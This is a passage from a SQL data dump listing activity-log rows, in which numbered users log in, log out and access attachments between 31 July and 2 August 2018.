08:56:18',NULL),(1459,2,'Attachment',41,'2018-07-31 08:56:18','2018-07-31 08:56:18',NULL),(1460,2,'Attachment',42,'2018-07-31 08:56:18','2018-07-31 08:56:18',NULL),(1461,2,'Attachment',47,'2018-07-31 08:56:18','2018-07-31 08:56:18',NULL),(1462,2,'Attachment',70,'2018-07-31 09:08:45','2018-07-31 09:08:45',NULL),(1463,2,'Attachment',69,'2018-07-31 09:08:45','2018-07-31 09:08:45',NULL),(1464,2,'Attachment',66,'2018-07-31 09:08:46','2018-07-31 09:08:46',NULL),(1465,2,'Attachment',107,'2018-07-31 09:08:46','2018-07-31 09:08:46',NULL),(1466,2,'Attachment',68,'2018-07-31 09:08:46','2018-07-31 09:08:46',NULL),(1467,2,'Attachment',105,'2018-07-31 09:08:46','2018-07-31 09:08:46',NULL),(1468,2,'Attachment',61,'2018-07-31 09:08:46','2018-07-31 09:08:46',NULL),(1469,2,'Attachment',60,'2018-07-31 09:08:46','2018-07-31 09:08:46',NULL),(1470,2,'Attachment',57,'2018-07-31 09:08:46','2018-07-31 09:08:46',NULL),(1471,1,'Login',1,'2018-07-31 09:08:56','2018-07-31 09:08:56',NULL),(1472,1,'Attachment',105,'2018-07-31 09:09:00','2018-07-31 09:09:00',NULL),(1473,2,'Attachment',105,'2018-07-31 10:58:33','2018-07-31 10:58:33',NULL),(1474,2,'Attachment',69,'2018-07-31 10:58:33','2018-07-31 10:58:33',NULL),(1475,2,'Attachment',70,'2018-07-31 10:58:33','2018-07-31 10:58:33',NULL),(1476,2,'Attachment',68,'2018-07-31 10:58:33','2018-07-31 10:58:33',NULL),(1477,2,'Attachment',66,'2018-07-31 10:58:33','2018-07-31 10:58:33',NULL),(1478,2,'Attachment',61,'2018-07-31 10:58:33','2018-07-31 10:58:33',NULL),(1479,2,'Attachment',107,'2018-07-31 10:58:34','2018-07-31 10:58:34',NULL),(1480,2,'Attachment',60,'2018-07-31 10:58:34','2018-07-31 10:58:34',NULL),(1481,2,'Attachment',57,'2018-07-31 10:58:34','2018-07-31 10:58:34',NULL),(1482,7,'Login',7,'2018-07-31 11:03:58','2018-07-31 11:03:58',NULL),(1483,2,'Attachment',68,'2018-07-31 11:07:55','2018-07-31 11:07:55',NULL),(1484,2,'Attachment',69,'2018-07-31 11:07:55','2018-07-31 11:07:55',NULL),(1485,2,'Attachment',70,'2018-07-31 11:07:55','2018-07-31 11:07:55',NULL),(1486,2,'Attachment',105,'2018-07-31 11:07:55','2018-07-31 11:07:55',NULL),(1487,2,'Attachment',66,'2018-07-31 11:07:55','2018-07-31 11:07:55',NULL),(1488,2,'Attachment',57,'2018-07-31 11:07:55','2018-07-31 11:07:55',NULL),(1489,2,'Attachment',60,'2018-07-31 11:07:55','2018-07-31 11:07:55',NULL),(1490,2,'Attachment',61,'2018-07-31 11:07:55','2018-07-31 11:07:55',NULL),(1491,2,'Attachment',107,'2018-07-31 11:07:55','2018-07-31 11:07:55',NULL),(1492,5,'Login',5,'2018-07-31 11:08:00','2018-07-31 11:08:00',NULL),(1493,7,'Login',7,'2018-07-31 11:10:49','2018-07-31 11:10:49',NULL),(1494,7,'Attachment',105,'2018-07-31 11:11:14','2018-07-31 11:11:14',NULL),(1495,7,'Attachment',61,'2018-07-31 11:11:14','2018-07-31 11:11:14',NULL),(1496,7,'Attachment',69,'2018-07-31 11:11:14','2018-07-31 11:11:14',NULL),(1497,7,'Attachment',66,'2018-07-31 11:11:14','2018-07-31 11:11:14',NULL),(1498,7,'Attachment',68,'2018-07-31 11:11:14','2018-07-31 11:11:14',NULL),(1499,7,'Attachment',70,'2018-07-31 11:11:14','2018-07-31 11:11:14',NULL),(1500,7,'Attachment',107,'2018-07-31 11:11:14','2018-07-31 11:11:14',NULL),(1501,7,'Attachment',60,'2018-07-31 11:11:14','2018-07-31 11:11:14',NULL),(1502,7,'Attachment',57,'2018-07-31 11:11:14','2018-07-31 11:11:14',NULL),(1503,2,'Attachment',70,'2018-07-31 11:11:30','2018-07-31 11:11:30',NULL),(1504,2,'Attachment',105,'2018-07-31 11:11:30','2018-07-31 11:11:30',NULL),(1505,2,'Attachment',66,'2018-07-31 11:11:30','2018-07-31 11:11:30',NULL),(1506,2,'Attachment',68,'2018-07-31 11:11:30','2018-07-31 11:11:30',NULL),(1507,2,'Attachment',69,'2018-07-31 11:11:30','2018-07-31 11:11:30',NULL),(1508,2,'Attachment',61,'2018-07-31 11:11:30','2018-07-31 11:11:30',NULL),(1509,2,'Attachment',60,'2018-07-31 11:11:30','2018-07-31 11:11:30',NULL),(1510,2,'Attachment',57,'2018-07-31 11:11:30','2018-07-31 11:11:30',NULL),(1511,2,'Attachment',107,'2018-07-31 11:11:30','2018-07-31 11:11:30',NULL),(1512,2,'Attachment',56,'2018-07-31 11:11:37','2018-07-31 11:11:37',NULL),(1513,2,'Attachment',25,'2018-07-31 11:11:37','2018-07-31 11:11:37',NULL),(1514,2,'Attachment',55,'2018-07-31 11:11:37','2018-07-31 11:11:37',NULL),(1515,2,'Attachment',54,'2018-07-31 11:11:37','2018-07-31 11:11:37',NULL),(1516,2,'Attachment',14,'2018-07-31 11:11:37','2018-07-31 11:11:37',NULL),(1517,2,'Attachment',38,'2018-07-31 11:11:37','2018-07-31 11:11:37',NULL),(1518,2,'Attachment',20,'2018-07-31 11:11:38','2018-07-31 11:11:38',NULL),(1519,2,'Attachment',21,'2018-07-31 11:11:38','2018-07-31 11:11:38',NULL),(1520,2,'Attachment',19,'2018-07-31 11:11:40','2018-07-31 11:11:40',NULL),(1521,2,'Attachment',26,'2018-07-31 11:11:40','2018-07-31 11:11:40',NULL),(1522,2,'Attachment',22,'2018-07-31 11:11:40','2018-07-31 11:11:40',NULL),(1523,2,'Attachment',41,'2018-07-31 11:11:40','2018-07-31 11:11:40',NULL),(1524,2,'Attachment',27,'2018-07-31 11:11:40','2018-07-31 11:11:40',NULL),(1525,2,'Attachment',15,'2018-07-31 11:11:40','2018-07-31 11:11:40',NULL),(1526,2,'Attachment',42,'2018-07-31 11:11:41','2018-07-31 11:11:41',NULL),(1527,2,'Attachment',43,'2018-07-31 11:11:41','2018-07-31 11:11:41',NULL),(1528,1,'Logout',1,'2018-07-31 11:14:13','2018-07-31 11:14:13',NULL),(1529,7,'Attachment',55,'2018-07-31 11:18:08','2018-07-31 11:18:08',NULL),(1530,7,'Attachment',56,'2018-07-31 11:18:08','2018-07-31 11:18:08',NULL),(1531,7,'Attachment',54,'2018-07-31 11:18:08','2018-07-31 11:18:08',NULL),(1532,7,'Attachment',25,'2018-07-31 11:18:08','2018-07-31 11:18:08',NULL),(1533,7,'Attachment',14,'2018-07-31 11:18:08','2018-07-31 11:18:08',NULL),(1534,7,'Attachment',38,'2018-07-31 11:18:08','2018-07-31 11:18:08',NULL),(1535,7,'Attachment',20,'2018-07-31 11:18:08','2018-07-31 11:18:08',NULL),(1536,7,'Attachment',21,'2018-07-31 11:18:08','2018-07-31 11:18:08',NULL),(1537,7,'Attachment',15,'2018-07-31 11:18:11','2018-07-31 11:18:11',NULL),(1538,7,'Attachment',22,'2018-07-31 11:18:11','2018-07-31 11:18:11',NULL),(1539,7,'Attachment',27,'2018-07-31 11:18:11','2018-07-31 11:18:11',NULL),(1540,7,'Attachment',19,'2018-07-31 11:18:11','2018-07-31 11:18:11',NULL),(1541,7,'Attachment',41,'2018-07-31 11:18:11','2018-07-31 11:18:11',NULL),(1542,7,'Attachment',26,'2018-07-31 11:18:11','2018-07-31 11:18:11',NULL),(1543,7,'Attachment',43,'2018-07-31 11:18:12','2018-07-31 11:18:12',NULL),(1544,7,'Attachment',42,'2018-07-31 11:18:12','2018-07-31 11:18:12',NULL),(1545,5,'Attachment',105,'2018-07-31 11:19:09','2018-07-31 11:19:09',NULL),(1546,5,'Attachment',60,'2018-07-31 11:19:09','2018-07-31 11:19:09',NULL),(1547,5,'Attachment',57,'2018-07-31 11:19:09','2018-07-31 11:19:09',NULL),(1548,5,'Attachment',70,'2018-07-31 11:19:09','2018-07-31 11:19:09',NULL),(1549,5,'Attachment',66,'2018-07-31 11:19:09','2018-07-31 11:19:09',NULL),(1550,5,'Attachment',61,'2018-07-31 11:19:09','2018-07-31 11:19:09',NULL),(1551,5,'Attachment',107,'2018-07-31 11:19:09','2018-07-31 11:19:09',NULL),(1552,1,'Login',1,'2018-07-31 14:15:28','2018-07-31 14:15:28',NULL),(1553,7,'Attachment',27,'2018-07-31 14:22:37','2018-07-31 14:22:37',NULL),(1554,7,'Attachment',26,'2018-07-31 14:22:37','2018-07-31 14:22:37',NULL),(1555,7,'Attachment',15,'2018-07-31 14:22:37','2018-07-31 14:22:37',NULL),(1556,7,'Attachment',39,'2018-07-31 14:22:38','2018-07-31 14:22:38',NULL),(1557,7,'Attachment',49,'2018-07-31 14:22:43','2018-07-31 14:22:43',NULL),(1558,7,'Attachment',50,'2018-07-31 14:22:43','2018-07-31 14:22:43',NULL),(1559,7,'Attachment',51,'2018-07-31 14:22:43','2018-07-31 14:22:43',NULL),(1560,7,'Attachment',42,'2018-07-31 14:22:45','2018-07-31 14:22:45',NULL),(1561,7,'Attachment',44,'2018-07-31 14:22:45','2018-07-31 14:22:45',NULL),(1562,7,'Attachment',46,'2018-07-31 14:22:45','2018-07-31 14:22:45',NULL),(1563,7,'Attachment',45,'2018-07-31 14:22:45','2018-07-31 14:22:45',NULL),(1564,7,'Attachment',43,'2018-07-31 14:22:45','2018-07-31 14:22:45',NULL),(1565,7,'Attachment',41,'2018-07-31 14:22:45','2018-07-31 14:22:45',NULL),(1566,7,'Attachment',47,'2018-07-31 14:22:46','2018-07-31 14:22:46',NULL),(1567,5,'Login',5,'2018-07-31 15:04:05','2018-07-31 15:04:05',NULL),(1568,1,'Login',1,'2018-07-31 15:05:16','2018-07-31 15:05:16',NULL),(1569,5,'Logout',5,'2018-07-31 15:05:16','2018-07-31 15:05:16',NULL),(1570,2,'Attachment',61,'2018-07-31 15:05:16','2018-07-31 15:05:16',NULL),(1571,2,'Attachment',70,'2018-07-31 15:05:28','2018-07-31 15:05:28',NULL),(1572,2,'Attachment',69,'2018-07-31 15:05:28','2018-07-31 15:05:28',NULL),(1573,5,'Login',5,'2018-07-31 15:05:35','2018-07-31 15:05:35',NULL),(1574,5,'Attachment',70,'2018-07-31 15:05:45','2018-07-31 15:05:45',NULL),(1575,5,'Attachment',69,'2018-07-31 15:05:45','2018-07-31 15:05:45',NULL),(1576,5,'Attachment',68,'2018-07-31 15:05:45','2018-07-31 15:05:45',NULL),(1577,5,'Logout',5,'2018-07-31 15:08:15','2018-07-31 15:08:15',NULL),(1578,2,'Attachment',70,'2018-07-31 15:08:15','2018-07-31 15:08:15',NULL),(1579,2,'Attachment',68,'2018-07-31 15:08:15','2018-07-31 15:08:15',NULL),(1580,2,'Attachment',69,'2018-07-31 15:08:15','2018-07-31 15:08:15',NULL),(1581,2,'Attachment',61,'2018-07-31 15:08:15','2018-07-31 15:08:15',NULL),(1582,1,'Login',1,'2018-07-31 15:42:15','2018-07-31 15:42:15',NULL),(1583,1,'Login',1,'2018-07-31 15:42:15','2018-07-31 15:42:15',NULL),(1584,1,'Attachment',105,'2018-07-31 15:42:34','2018-07-31 15:42:34',NULL),(1585,1,'Attachment',68,'2018-07-31 15:42:34','2018-07-31 15:42:34',NULL),(1586,1,'Attachment',70,'2018-07-31 15:42:34','2018-07-31 15:42:34',NULL),(1587,1,'Attachment',66,'2018-07-31 15:42:34','2018-07-31 15:42:34',NULL),(1588,1,'Attachment',69,'2018-07-31 15:42:34','2018-07-31 15:42:34',NULL),(1589,1,'Attachment',107,'2018-07-31 15:42:34','2018-07-31 15:42:34',NULL),(1590,1,'Attachment',61,'2018-07-31 15:42:34','2018-07-31 15:42:34',NULL),(1591,1,'Attachment',60,'2018-07-31 15:42:34','2018-07-31 15:42:34',NULL),(1592,1,'Attachment',57,'2018-07-31 15:42:35','2018-07-31 15:42:35',NULL),(1593,1,'Attachment',56,'2018-07-31 15:51:38','2018-07-31 15:51:38',NULL),(1594,1,'Attachment',14,'2018-07-31 15:51:38','2018-07-31 15:51:38',NULL),(1595,1,'Attachment',25,'2018-07-31 15:51:38','2018-07-31 15:51:38',NULL),(1596,1,'Attachment',38,'2018-07-31 15:51:38','2018-07-31 15:51:38',NULL),(1597,1,'Attachment',55,'2018-07-31 15:51:38','2018-07-31 15:51:38',NULL),(1598,1,'Attachment',54,'2018-07-31 15:51:38','2018-07-31 15:51:38',NULL),(1599,1,'Attachment',20,'2018-07-31 15:51:39','2018-07-31 15:51:39',NULL),(1600,1,'Attachment',21,'2018-07-31 15:51:39','2018-07-31 15:51:39',NULL),(1601,2,'Attachment',69,'2018-07-31 15:59:35','2018-07-31 15:59:35',NULL),(1602,2,'Attachment',61,'2018-07-31 15:59:35','2018-07-31 15:59:35',NULL),(1603,2,'Attachment',70,'2018-07-31 15:59:35','2018-07-31 15:59:35',NULL),(1604,2,'Attachment',68,'2018-07-31 15:59:35','2018-07-31 15:59:35',NULL),(1605,2,'Attachment',66,'2018-07-31 15:59:35','2018-07-31 15:59:35',NULL),(1606,2,'Attachment',60,'2018-07-31 15:59:35','2018-07-31 15:59:35',NULL),(1607,2,'Attachment',107,'2018-07-31 15:59:35','2018-07-31 15:59:35',NULL),(1608,2,'Attachment',57,'2018-07-31 15:59:35','2018-07-31 15:59:35',NULL),(1609,5,'Login',5,'2018-07-31 15:59:41','2018-07-31 15:59:41',NULL),(1610,2,'Attachment',70,'2018-07-31 16:59:07','2018-07-31 16:59:07',NULL),(1611,2,'Attachment',69,'2018-07-31 16:59:07','2018-07-31 16:59:07',NULL),(1612,5,'Login',5,'2018-07-31 16:59:14','2018-07-31 16:59:14',NULL),(1613,5,'Attachment',70,'2018-07-31 17:05:23','2018-07-31 17:05:23',NULL),(1614,5,'Attachment',61,'2018-07-31 17:05:23','2018-07-31 17:05:23',NULL),(1615,5,'Attachment',69,'2018-07-31 17:05:23','2018-07-31 17:05:23',NULL),(1616,5,'Attachment',68,'2018-07-31 17:05:23','2018-07-31 17:05:23',NULL),(1617,5,'Logout',5,'2018-07-31 17:09:23','2018-07-31 17:09:23',NULL),(1618,5,'Login',5,'2018-07-31 17:09:37','2018-07-31 17:09:37',NULL),(1619,5,'Attachment',61,'2018-07-31 17:19:21','2018-07-31 17:19:21',NULL),(1620,2,'Attachment',68,'2018-08-01 08:53:55','2018-08-01 08:53:55',NULL),(1621,2,'Attachment',105,'2018-08-01 08:53:55','2018-08-01 08:53:55',NULL),(1622,2,'Attachment',69,'2018-08-01 08:53:55','2018-08-01 08:53:55',NULL),(1623,2,'Attachment',70,'2018-08-01 08:53:55','2018-08-01 08:53:55',NULL),(1624,2,'Attachment',66,'2018-08-01 08:53:55','2018-08-01 08:53:55',NULL),(1625,2,'Attachment',61,'2018-08-01 08:53:55','2018-08-01 08:53:55',NULL),(1626,2,'Attachment',60,'2018-08-01 08:53:55','2018-08-01 08:53:55',NULL),(1627,2,'Attachment',57,'2018-08-01 08:53:55','2018-08-01 08:53:55',NULL),(1628,2,'Attachment',107,'2018-08-01 08:53:55','2018-08-01 08:53:55',NULL),(1629,2,'Attachment',55,'2018-08-01 08:57:42','2018-08-01 08:57:42',NULL),(1630,2,'Attachment',54,'2018-08-01 08:57:42','2018-08-01 08:57:42',NULL),(1631,2,'Attachment',25,'2018-08-01 08:57:42','2018-08-01 08:57:42',NULL),(1632,2,'Attachment',56,'2018-08-01 08:57:42','2018-08-01 08:57:42',NULL),(1633,2,'Attachment',38,'2018-08-01 08:57:42','2018-08-01 08:57:42',NULL),(1634,2,'Attachment',14,'2018-08-01 08:57:42','2018-08-01 08:57:42',NULL),(1635,2,'Attachment',20,'2018-08-01 08:57:42','2018-08-01 08:57:42',NULL),(1636,2,'Attachment',21,'2018-08-01 08:57:42','2018-08-01 08:57:42',NULL),(1637,2,'Attachment',41,'2018-08-01 08:57:45','2018-08-01 08:57:45',NULL),(1638,2,'Attachment',22,'2018-08-01 08:57:45','2018-08-01 08:57:45',NULL),(1639,2,'Attachment',15,'2018-08-01 08:57:45','2018-08-01 08:57:45',NULL),(1640,2,'Attachment',26,'2018-08-01 08:57:45','2018-08-01 08:57:45',NULL),(1641,2,'Attachment',27,'2018-08-01 08:57:45','2018-08-01 08:57:45',NULL),(1642,2,'Attachment',19,'2018-08-01 08:57:45','2018-08-01 08:57:45',NULL),(1643,2,'Attachment',43,'2018-08-01 08:57:46','2018-08-01 08:57:46',NULL),(1644,2,'Attachment',42,'2018-08-01 08:57:46','2018-08-01 08:57:46',NULL),(1645,2,'Attachment',45,'2018-08-01 08:57:47','2018-08-01 08:57:47',NULL),(1646,2,'Attachment',44,'2018-08-01 08:57:47','2018-08-01 08:57:47',NULL),(1647,2,'Attachment',47,'2018-08-01 08:57:47','2018-08-01 08:57:47',NULL),(1648,2,'Attachment',46,'2018-08-01 08:57:47','2018-08-01 08:57:47',NULL),(1649,2,'Attachment',48,'2018-08-01 08:57:47','2018-08-01 08:57:47',NULL),(1650,2,'Attachment',40,'2018-08-01 08:57:47','2018-08-01 08:57:47',NULL),(1651,2,'Attachment',9,'2018-08-01 08:57:47','2018-08-01 08:57:47',NULL),(1652,2,'Attachment',36,'2018-08-01 08:57:47','2018-08-01 08:57:47',NULL),(1653,2,'Attachment',29,'2018-08-01 08:57:48','2018-08-01 08:57:48',NULL),(1654,2,'Attachment',49,'2018-08-01 08:57:48','2018-08-01 08:57:48',NULL),(1655,2,'Attachment',28,'2018-08-01 08:57:48','2018-08-01 08:57:48',NULL),(1656,2,'Attachment',37,'2018-08-01 08:57:48','2018-08-01 08:57:48',NULL),(1657,2,'Attachment',50,'2018-08-01 08:57:48','2018-08-01 08:57:48',NULL),(1658,2,'Attachment',51,'2018-08-01 08:57:48','2018-08-01 08:57:48',NULL),(1659,2,'Attachment',35,'2018-08-01 08:57:48','2018-08-01 08:57:48',NULL),(1660,2,'Attachment',34,'2018-08-01 08:57:49','2018-08-01 08:57:49',NULL),(1661,2,'Attachment',31,'2018-08-01 08:57:49','2018-08-01 08:57:49',NULL),(1662,2,'Attachment',30,'2018-08-01 08:57:49','2018-08-01 08:57:49',NULL),(1663,2,'Attachment',32,'2018-08-01 08:57:49','2018-08-01 08:57:49',NULL),(1664,2,'Attachment',33,'2018-08-01 08:57:49','2018-08-01 08:57:49',NULL),(1665,2,'Attachment',39,'2018-08-01 08:57:50','2018-08-01 08:57:50',NULL),(1666,2,'Attachment',23,'2018-08-01 08:57:51','2018-08-01 08:57:51',NULL),(1667,2,'Attachment',24,'2018-08-01 08:57:51','2018-08-01 08:57:51',NULL),(1668,2,'Attachment',105,'2018-08-01 09:09:34','2018-08-01 09:09:34',NULL),(1669,2,'Attachment',70,'2018-08-01 09:09:36','2018-08-01 09:09:36',NULL),(1670,2,'Attachment',66,'2018-08-01 09:09:36','2018-08-01 09:09:36',NULL),(1671,2,'Attachment',69,'2018-08-01 09:09:36','2018-08-01 09:09:36',NULL),(1672,2,'Attachment',61,'2018-08-01 09:09:36','2018-08-01 09:09:36',NULL),(1673,2,'Attachment',60,'2018-08-01 09:09:36','2018-08-01 09:09:36',NULL),(1674,2,'Attachment',57,'2018-08-01 09:09:36','2018-08-01 09:09:36',NULL),(1675,2,'Attachment',107,'2018-08-01 09:09:36','2018-08-01 09:09:36',NULL),(1676,2,'Attachment',68,'2018-08-01 09:09:36','2018-08-01 09:09:36',NULL),(1677,5,'Attachment',43,'2018-08-01 09:12:04','2018-08-01 09:12:04',NULL),(1678,5,'Attachment',45,'2018-08-01 09:12:04','2018-08-01 09:12:04',NULL),(1679,5,'Attachment',42,'2018-08-01 09:12:04','2018-08-01 09:12:04',NULL),(1680,5,'Attachment',41,'2018-08-01 09:12:04','2018-08-01 09:12:04',NULL),(1681,5,'Attachment',44,'2018-08-01 09:12:04','2018-08-01 09:12:04',NULL),(1682,5,'Attachment',46,'2018-08-01 09:12:04','2018-08-01 09:12:04',NULL),(1683,5,'Attachment',47,'2018-08-01 09:12:04','2018-08-01 09:12:04',NULL),(1684,1,'Login',1,'2018-08-01 09:12:50','2018-08-01 09:12:50',NULL),(1685,5,'Attachment',70,'2018-08-01 09:16:56','2018-08-01 09:16:56',NULL),(1686,5,'Attachment',69,'2018-08-01 09:16:56','2018-08-01 09:16:56',NULL),(1687,7,'Login',7,'2018-08-01 09:45:18','2018-08-01 09:45:18',NULL),(1688,1,'Login',1,'2018-08-01 10:43:52','2018-08-01 10:43:52',NULL),(1689,2,'Attachment',66,'2018-08-01 11:09:07','2018-08-01 11:09:07',NULL),(1690,2,'Attachment',105,'2018-08-01 11:09:07','2018-08-01 11:09:07',NULL),(1691,2,'Attachment',68,'2018-08-01 11:09:07','2018-08-01 11:09:07',NULL),(1692,2,'Attachment',70,'2018-08-01 11:09:07','2018-08-01 11:09:07',NULL),(1693,2,'Attachment',69,'2018-08-01 11:09:07','2018-08-01 11:09:07',NULL),(1694,2,'Attachment',61,'2018-08-01 11:09:08','2018-08-01 11:09:08',NULL),(1695,2,'Attachment',107,'2018-08-01 11:09:08','2018-08-01 11:09:08',NULL),(1696,2,'Attachment',60,'2018-08-01 11:09:08','2018-08-01 11:09:08',NULL),(1697,2,'Attachment',57,'2018-08-01 11:09:08','2018-08-01 11:09:08',NULL),(1698,1,'Attachment',106,'2018-08-01 14:53:12','2018-08-01 14:53:12',NULL),(1699,1,'Login',1,'2018-08-01 14:58:03','2018-08-01 14:58:03',NULL),(1700,1,'Logout',1,'2018-08-01 17:35:37','2018-08-01 17:35:37',NULL),(1701,2,'Attachment',70,'2018-08-02 15:24:28','2018-08-02 15:24:28',NULL),(1702,2,'Attachment',68,'2018-08-02 15:24:28','2018-08-02 15:24:28',NULL),(1703,2,'Attachment',105,'2018-08-02 15:24:28','2018-08-02 15:24:28',NULL),(1704,2,'Attachment',66,'2018-08-02 15:24:28','2018-08-02 15:24:28',NULL),(1705,2,'Attachment',69,'2018-08-02 15:24:28','2018-08-02 15:24:28',NULL),(1706,2,'Attachment',61,'2018-08-02 15:24:28','2018-08-02 15:24:28',NULL),(1707,2,'Attachment',60,'2018-08-02 15:24:28','2018-08-02 15:24:28',NULL),(1708,2,'Attachment',57,'2018-08-02 15:24:28','2018-08-02 15:24:28',NULL),(1709,2,'Attachment',107,'2018-08-02 15:24:29','2018-08-02 15:24:29',NULL),(1710,2,'Attachment',38,'2018-08-02 15:24:33','2018-08-02 15:24:33',NULL),(1711,2,'Attachment',54,'2018-08-02 15:24:33','2018-08-02 15:24:33',NULL),(1712,2,'Attachment',55,'2018-08-02 15:24:33','2018-08-02 15:24:33',NULL),(1713,2,'Attachment',25,'2018-08-02 15:24:33','2018-08-02 15:24:33',NULL),(1714,2,'Attachment',56,'2018-08-02 15:24:33','2018-08-02 15:24:33',NULL),(1715,2,'Attachment',14,'2018-08-02 15:24:33','2018-08-02 15:24:33',NULL),(1716,2,'Attachment',20,'2018-08-02 15:24:33','2018-08-02 15:24:33',NULL),(1717,2,'Attachment',21,'2018-08-02 15:24:33','2018-08-02 15:24:33',NULL),(1718,2,'Attachment',55,'2018-08-02 15:46:03','2018-08-02 15:46:03',NULL),(1719,2,'Attachment',26,'2018-08-02 15:46:04','2018-08-02 15:46:04',NULL),(1720,2,'Attachment',25,'2018-08-02 15:46:04','2018-08-02 15:46:04',NULL),(1721,2,'Attachment',38,'2018-08-02 15:46:04','2018-08-02 15:46:04',NULL),(1722,2,'Attachment',27,'2018-08-02 15:46:04','2018-08-02 15:46:04',NULL),(1723,2,'Attachment',15,'2018-08-02 15:46:04','2018-08-02 15:46:04',NULL),(1724,2,'Attachment',54,'2018-08-02 15:46:04','2018-08-02 15:46:04',NULL),(1725,1,'Login',1,'2018-08-02 15:46:38','2018-08-02 15:46:38',NULL),(1726,2,'Attachment',105,'2018-08-02 16:01:52','2018-08-02 16:01:52',NULL),(1727,2,'Attachment',70,'2018-08-02 16:01:52','2018-08-02 16:01:52',NULL),(1728,2,'Attachment',68,'2018-08-02 16:01:52','2018-08-02 16:01:52',NULL),(1729,2,'Attachment',66,'2018-08-02 16:01:52','2018-08-02 16:01:52',NULL),(1730,2,'Attachment',69,'2018-08-02 16:01:52','2018-08-02 16:01:52',NULL),(1731,2,'Attachment',107,'2018-08-02 16:01:52','2018-08-02 16:01:52',NULL),(1732,2,'Attachment',61,'2018-08-02 16:01:52','2018-08-02 16:01:52',NULL),(1733,2,'Attachment',60,'2018-08-02 16:01:52','2018-08-02 16:01:52',NULL),(1734,2,'Attachment',57,'2018-08-02 16:01:52','2018-08-02 16:01:52',NULL),(1735,1,'Login',1,'2018-08-02 16:34:44','2018-08-02 16:34:44',NULL),(1736,2,'Attachment',105,'2018-08-02 16:35:20','2018-08-02 16:35:20',NULL),(1737,2,'Attachment',70,'2018-08-02 16:35:20','2018-08-02 16:35:20',NULL),(1738,2,'Attachment',69,'2018-08-02 16:35:20','2018-08-02 16:35:20',NULL),(1739,2,'Attachment',68,'2018-08-02 16:35:20','2018-08-02 16:35:20',NULL),(1740,2,'Attachment',61,'2018-08-02 16:35:21','2018-08-02 16:35:21',NULL),(1741,2,'Attachment',66,'2018-08-02 16:35:21','2018-08-02 16:35:21',NULL),(1742,2,'Attachment',107,'2018-08-02 16:35:21','2018-08-02 16:35:21',NULL),(1743,2,'Attachment',60,'2018-08-02 16:35:21','2018-08-02 16:35:21',NULL),(1744,2,'Attachment',57,'2018-08-02 16:35:21','2018-08-02 16:35:21',NULL),(1745,1,'Login',1,'2018-08-02 16:35:33','2018-08-02 16:35:33',NULL),(1746,1,'Login',1,'2018-08-02 17:08:35','2018-08-02 17:08:35',NULL),(1747,1,'Attachment',106,'2018-08-02 17:08:47','2018-08-02 17:08:47',NULL),(1748,2,'Attachment',25,'2018-08-02 17:11:48','2018-08-02 17:11:48',NULL),(1749,2,'Attachment',56,'2018-08-02 17:11:48','2018-08-02 17:11:48',NULL),(1750,2,'Attachment',14,'2018-08-02 17:11:48','2018-08-02 17:11:48',NULL),(1751,2,'Attachment',55,'2018-08-02 17:11:48','2018-08-02 17:11:48',NULL),(1752,2,'Attachment',54,'2018-08-02 17:11:48','2018-08-02 17:11:48',NULL),(1753,2,'Attachment',38,'2018-08-02 17:11:48','2018-08-02 17:11:48',NULL),(1754,2,'Attachment',20,'2018-08-02 17:11:48','2018-08-02 17:11:48',NULL),(1755,2,'Attachment',21,'2018-08-02 17:11:48','2018-08-02 17:11:48',NULL),(1756,2,'Attachment',44,'2018-08-02 17:13:22','2018-08-02 17:13:22',NULL),(1757,2,'Attachment',46,'2018-08-02 17:13:22','2018-08-02 17:13:22',NULL),(1758,2,'Attachment',45,'2018-08-02 17:13:22','2018-08-02 17:13:22',NULL),(1759,2,'Attachment',43,'2018-08-02 17:13:22','2018-08-02 17:13:22',NULL),(1760,2,'Attachment',42,'2018-08-02 17:13:22','2018-08-02 17:13:22',NULL),(1761,2,'Attachment',41,'2018-08-02 17:13:22','2018-08-02 17:13:22',NULL),(1762,2,'Attachment',47,'2018-08-02 17:13:23','2018-08-02 17:13:23',NULL),(1763,2,'Attachment',66,'2018-08-02 18:03:55','2018-08-02 18:03:55',NULL),(1764,2,'Attachment',70,'2018-08-02 18:03:55','2018-08-02 18:03:55',NULL),(1765,2,'Attachment',69,'2018-08-02 18:03:55','2018-08-02 18:03:55',NULL),(1766,2,'Attachment',61,'2018-08-02 18:03:55','2018-08-02 18:03:55',NULL),(1767,2,'Attachment',68,'2018-08-02 18:03:55','2018-08-02 18:03:55',NULL),(1768,2,'Attachment',60,'2018-08-02 18:03:55','2018-08-02 18:03:55',NULL),(1769,2,'Attachment',107,'2018-08-02 18:03:55','2018-08-02 18:03:55',NULL),(1770,2,'Attachment',57,'2018-08-02 18:03:55','2018-08-02 18:03:55',NULL),(1771,1,'Login',1,'2018-08-02 18:10:01','2018-08-02 18:10:01',NULL),(1772,2,'Attachment',105,'2018-08-02 19:29:29','2018-08-02 19:29:29',NULL),(1773,2,'Attachment',107,'2018-08-02 19:29:30','2018-08-02 19:29:30',NULL),(1774,5,'Login',5,'2018-08-02 20:39:14','2018-08-02 20:39:14',NULL),(1775,5,'Attachment',108,'2018-08-02 21:09:22','2018-08-02 21:09:22',NULL),(1776,5,'Attachment',108,'2018-08-02 21:11:41','2018-08-02 21:11:41',NULL),(1777,5,'Attachment',111,'2018-08-02 21:35:27','2018-08-02 21:35:27',NULL),(1778,5,'Attachment',112,'2018-08-02 21:35:32','2018-08-02 21:35:32',NULL),(1779,5,'Attachment',112,'2018-08-02 21:35:46','2018-08-02 21:35:46',NULL),(1780,5,'Attachment',49,'2018-08-02 21:35:59','2018-08-02 21:35:59',NULL),(1781,2,'Attachment',112,'2018-08-02 22:06:52','2018-08-02 22:06:52',NULL),(1782,2,'Attachment',112,'2018-08-02 22:08:03','2018-08-02 22:08:03',NULL),(1783,2,'Attachment',112,'2018-08-02 22:12:35','2018-08-02 22:12:35',NULL),(1784,1,'Login',1,'2018-08-02 22:13:55','2018-08-02 22:13:55',NULL),(1785,1,'Attachment',106,'2018-08-02 22:48:19','2018-08-02 22:48:19',NULL),(1786,1,'Attachment',107,'2018-08-02 22:48:25','2018-08-02 22:48:25',NULL),(1787,1,'Logout',1,'2018-08-02 22:51:12','2018-08-02 22:51:12',NULL),(1788,2,'Attachment',112,'2018-08-02 22:51:41','2018-08-02 22:51:41',NULL),(1789,1,'Login',1,'2018-08-02 22:52:33','2018-08-02 22:52:33',NULL),(1790,1,'Logout',1,'2018-08-02 22:52:52','2018-08-02 22:52:52',NULL),(1791,2,'Attachment',112,'2018-08-02 22:52:53','2018-08-02 22:52:53',NULL),(1792,5,'Login',5,'2018-08-02 22:53:06','2018-08-02 